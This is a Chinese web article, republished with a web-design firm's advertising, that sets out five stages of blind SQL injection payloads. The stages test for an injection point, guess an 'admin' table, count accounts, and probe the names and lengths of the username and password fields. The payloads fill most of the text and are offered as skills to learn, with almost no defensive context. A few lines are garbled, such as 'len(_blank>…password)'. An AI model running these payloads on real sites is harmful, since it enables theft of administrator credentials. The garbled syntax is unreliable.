SQL注入语句五例

SQL注入语句是学习SQL语句过程中需要掌握的知识，下面就为您介绍5个标准的SQL注入语句，希望对您了解SQL注入语句有所帮助。

成都创新互联公司是一家集网站建设、做网站、网站页面设计、网站优化SEO优化为一体的专业的建站公司，已为成都等多地近百家企业提供网站建设服务。追求良好的浏览体验,以探求精品塑造与理念升华,设计最适合用户的网站页面。 合作只是第一步，服务才是根本,我们始终坚持讲诚信，负责任的原则，为您进行细心、贴心、认真的服务,与众多客户在蓬勃发展的市场环境中,互促共生。

1.判断有无注入点

 
 
 

  
  
  
; and 11=1 and 1=2 
 
 
 

2.猜表一般的表的名称无非是admin adminuser user pass password 等..

 
 
 

  
  
  
and 0<>(select count(*) from *)  
  
  
  
and 0<>(select count(*) from admin) ---判断是否存在admin这张表 
 
 
 

3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个

 
 
 

  
  
  
and 0<(select count(*) from admin)  
  
  
  
and 1<(select count(*) from admin) 
 
 
 

4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.

 
 
 

  
  
  
and 1=(select count(*) from admin where len(*)>0)--  
  
  
  
and 1=(select count(*) from admin where len(用户字段名称name)>0)   
  
  
  
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0) 
 
 
 

5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止

 
 
 

  
  
  
and 1=(select count(*) from admin where len(*)>0)   
  
  
  
and 1=(select count(*) from admin where len(name)>6) 错误  
  
  
  
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6  
  
  
  
and 1=(select count(*) from admin where len(name)=6) 正确  
  
  
  
 
  
  
  
and 1=(select count(*) from admin where len(password)>11) 正确  
  
  
  
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12  
  
  
  
and 1=(select count(*) from admin where len(password)=12) 正确 
 
 
 

延伸阅读

所谓SQL注入，就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令，比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的，这类表单特别容易受到SQL注入式攻击．

【编辑推荐】

SQL SERVER事务的语法介绍

Sql Server视图的概念

使用SQL查询连续号码段的方法

实现子孙树查询的经典SQL语句

查询表的字段名的sql语句写法

当前标题：SQL注入语句五例
文章分享：http://www.csdahua.cn/qtweb/news29/305879.html

网站建设、网络推广公司-快上网，是专注品牌与效果的网站制作，网络营销seo公司；服务项目有等

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 快上网